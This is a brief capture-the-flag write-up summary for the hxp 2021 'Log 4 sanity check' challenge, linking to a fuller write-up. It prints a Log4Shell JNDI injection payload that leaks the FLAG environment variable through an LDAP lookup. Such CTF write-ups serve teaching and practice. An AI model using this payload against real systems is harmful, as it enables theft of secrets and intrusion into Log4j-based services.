We should use log4j CVE to exploit jndi and get flag from environment variable with following command:

```bash
${jndi:ldap://127.0.0.1/${env:FLAG}}
```

link to [complete writeup](https://github.com/Execut3/CTF-WriteUps/tree/master/2021/hxp/misc/Log%204%20sanity%20check/)

Original writeup (https://github.com/Execut3/CTF-WriteUps/tree/master/2021/hxp/misc/Log%204%20sanity%20check).